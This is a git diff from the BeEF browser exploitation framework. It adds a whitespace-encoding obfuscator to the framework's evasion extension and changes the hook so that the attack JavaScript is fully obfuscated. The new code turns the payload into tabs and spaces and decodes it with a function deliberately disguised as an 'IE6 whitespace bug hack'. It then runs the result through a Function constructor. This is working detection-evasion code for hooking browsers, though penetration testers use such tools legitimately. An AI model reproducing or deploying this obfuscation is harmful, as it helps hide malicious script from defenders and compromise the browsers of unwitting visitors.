diff --git a/core/main/handlers/modules/beefjs.rb b/core/main/handlers/modules/beefjs.rb index 8e30ae735..38e48f05c 100644 --- a/core/main/handlers/modules/beefjs.rb +++ b/core/main/handlers/modules/beefjs.rb @@ -104,8 +104,7 @@ module BeEF if config.get("beef.extension.evasion.enable") evasion = BeEF::Extension::Evasion::Evasion.instance - @hook = evasion.add_bootstrapper + evasion.obfuscate(@hook) - @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate) + @hook + @final_hook = ext_js_to_not_obfuscate + evasion.add_bootstrapper + evasion.obfuscate(ext_js_to_obfuscate + @hook) else @final_hook = ext_js_to_not_obfuscate + @hook end diff --git a/extensions/evasion/config.yaml b/extensions/evasion/config.yaml index 712989a31..7d9db7f91 100644 --- a/extensions/evasion/config.yaml +++ b/extensions/evasion/config.yaml @@ -16,7 +16,7 @@ beef: extension: evasion: - enable: true + enable: true name: 'Evasion' authors: ["antisnatchor"] exclude_core_js: ["lib/jquery-1.5.2.min.js", "lib/json2.js", "lib/jools.min.js"] @@ -26,4 +26,5 @@ beef: beef: "beef" Beef: "Beef" evercookie: "evercookie" - chain: ["scramble", "minify"] + #chain: ["scramble", "minify"] + chain: ["minify", "base64", "whitespace"] diff --git a/extensions/evasion/extension.rb b/extensions/evasion/extension.rb index ce1fc360e..e7e5c25d5 100644 --- a/extensions/evasion/extension.rb +++ b/extensions/evasion/extension.rb @@ -30,3 +30,4 @@ require 'extensions/evasion/helper' require 'extensions/evasion/obfuscation/scramble' require 'extensions/evasion/obfuscation/minify' require 'extensions/evasion/obfuscation/base_64' +require 'extensions/evasion/obfuscation/whitespace' diff --git a/extensions/evasion/obfuscation/whitespace.rb b/extensions/evasion/obfuscation/whitespace.rb new file mode 100644 index 000000000..8c20217f4 --- /dev/null +++ b/extensions/evasion/obfuscation/whitespace.rb @@ -0,0 +1,68 @@ +# +# Copyright 2012 Wade Alcorn wade@bindshell.net +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +module BeEF + module Extension + module Evasion + class Whitespace + include Singleton + + def need_bootstrap + true + end + + def get_bootstrap + # the decode function is in plain text - called IE-spacer - because trolling is always a good idea + decode_function = +"//Dirty IE6 whitespace bug hack +function IE_spacer(css_space) { + var spacer = ''; + for(y = 0; y < css_space.length/8; y++) + { + v = 0; + for(x = 0; x < 8; x++) + { + if(css_space.charCodeAt(x+(y*8)) > 9) + { + v++; + } + if(x != 7) + { + v = v << 1; + } + } + spacer += String.fromCharCode(v); + }return spacer; +}" + end + + def execute(input, config) + size = input.length + encoded = encode(input) + var_name = BeEF::Extension::Evasion::Helper::random_string(3) + input = "var #{var_name}=\"#{encoded}\";[].constructor.constructor(IE_spacer(#{var_name}))();" + print_debug "[OBFUSCATION - WHITESPACE] #{size}byte of Javascript code has been Whitespaced" + input + end + + def encode(input) + output = input.unpack('B*') + output = output.to_s.gsub(/[\["01\]]/, '[' => '', '"' => '', ']' => '', '0' => "\t", '1' => ' ') + output + end + end + end + end +end